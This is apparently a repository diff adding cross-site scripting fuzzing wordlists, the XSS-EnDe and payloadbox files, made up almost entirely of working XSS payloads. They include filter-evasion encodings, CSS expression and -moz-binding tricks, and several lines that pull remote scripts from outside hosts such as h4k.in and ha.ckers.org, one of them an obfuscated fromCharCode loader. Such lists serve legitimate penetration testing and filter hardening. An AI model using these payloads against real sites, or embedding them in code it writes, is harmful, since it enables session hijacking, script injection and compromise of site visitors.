<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<style>body:after{content: “\61\6c\65\72\74\28\31\29″}</style><script>
eval(eval(document.styleSheets[0].cssRules[0].style.content))
</script>
<XSS STYLE="xss:expression(alert('XSS'))">
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
}</style><script>a=eval;b=alert;a(b(/i/.source));</script>
>"'
a=alert;a(0)
A=alert;A(1)
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
</textarea><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
http://aa"><script>alert(123)</script>
http://aa'><script>alert(123)</script>
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>

52
Fuzzing/XSS/robot-friendly/XSS-EnDe-mario.txt Normal file
View file

@ -0,0 +1,52 @@
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){//
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}
'';!--"<script>alert(0);</script>=&{(alert(1))}
"><script>alert(0);</script>
'><script>alert(0);</script>
'<script>alert(0);</script>
<img src=x onerror=;;alert(1) />
</title><script>alert(1)</script>
`> <script>alert(5)</script>
</textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>
</noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>
}</style><script>a=eval;b=alert;a(b(/i/.source));</script>
;}alert(0);{
"+alert(0)+"
xyz onerror=alert(6);
onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);
a=eval;b=alert;a(b(8));
a=1;a=eval;b=alert;a(b(11));//
';//%0da=eval;b=alert;a(b(9));//
";//%0da=eval;b=alert;a(b(10));//
'};a=eval;b=alert;a(b(13));//
"};a=eval;b=alert;a(b(12));//
1};a=eval;b=alert;a(b(14));//
'];a=eval;b=alert;a(b(15));//
"];a=eval;b=alert;a(b(16));//
1];a=eval;b=alert;a(b(17));//
1;a=eval;b=alert;a(b(/c/.source));
%0da=eval;b=alert;a(b(/d/.source));
*/a=eval;b=alert;a(b(/e/.source));/*
<script src=//h4k.in
<script src=http://h4k.in/>
<script src=//h4k.in></script>
"><script src=//h4k.in></script><
<scri
pt src=//h4k.in><
></script>
<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&#60&#115&#62&#51&#51&#51&#60&#47&#115&#62&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x2f&#x73&#x3e
"><script src=http://h4k.in/i.js></script>
"><script>a=document.createElement('script');a.src='http://h4k.in/i.js';document.body.appendChild(a);</script>
"><script>eval(String.fromCharCode(97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59))</script>
vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))
" style="color: expression(alert(0));" a="
</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
<img src=`x` onrerror= ` ;; alert(1) ` />
" style="-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
" sstyle="foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="
%0aContent-Type:text/html%0a%0a%3cscript%3ealert(0)%3c/script%3ehttp://www.google.de/
c%00""<script>alert(0);</script>
BODY{-moz-binding:url("http://h4k.in/mozxss.xml%23xss")}
x=alert;x(%26%2340 /finally through!/.source %26%2341);
%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//
http://aa<script>alert(123)</script>

109
Fuzzing/XSS/robot-friendly/XSS-EnDe-xssAttacks.txt Normal file
View file

@ -0,0 +1,109 @@
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
'';!--"<XSS>=&{()}
<SCRIPT>alert('XSS')</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<BASE HREF="javascript:alert('XSS');//">
<BGSOUND SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS');">
<BODY ONLOAD=alert('XSS')>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS');">
<IMG LOWSRC="javascript:alert('XSS');">
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
exp/*<XSS STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox("XSS")'>
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<IMG SRC="livescript:[code]">
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IMG SRC="mocha:[code]">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";eval(a+b+c+d);
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<BR SIZE="&{alert('XSS')}">
<%3C&lt&lt;&LT&LT;&#60&#060&#0060&#00060&#000060&#0000060&#60;&#060;&#0060;&#00060;&#000060;&#0000060;&#x3c&#x03c&#x003c&#x0003c&#x00003c&#x000003c&#x3c;&#x03c;&#x003c;&#x0003c;&#x00003c;&#x000003c;&#X3c&#X03c&#X003c&#X0003c&#X00003c&#X000003c&#X3c;&#X03c;&#X003c;&#X0003c;&#X00003c;&#X000003c;&#x3C&#x03C&#x003C&#x0003C&#x00003C&#x000003C&#x3C;&#x03C;&#x003C;&#x0003C;&#x00003C;&#x000003C;&#X3C&#X03C&#X003C&#X0003C&#X00003C&#X000003C&#X3C;&#X03C;&#X003C;&#X0003C;&#X00003C;&#X000003C;\x3c\x3C\u003c\u003C
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
<IMG SRC=" &#14; javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT SRC=http://ha.ckers.org/xss.js
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
<<SCRIPT>alert("XSS");//<</SCRIPT>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="htt p://6&#09;6.000146.0x7.147/">XSS</A>
<A HREF="//www.google.com/">XSS</A>
<A HREF="//google">XSS</A>
<A HREF="http://ha.ckers.org@google">XSS</A>
<A HREF="http://google:ha.ckers.org">XSS</A>
<A HREF="http://google.com/">XSS</A>
<A HREF="http://www.google.com./">XSS</A>
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>

2690
Fuzzing/XSS/robot-friendly/XSS-payloadbox.txt Normal file
View file

File diff suppressed because it is too large Load diff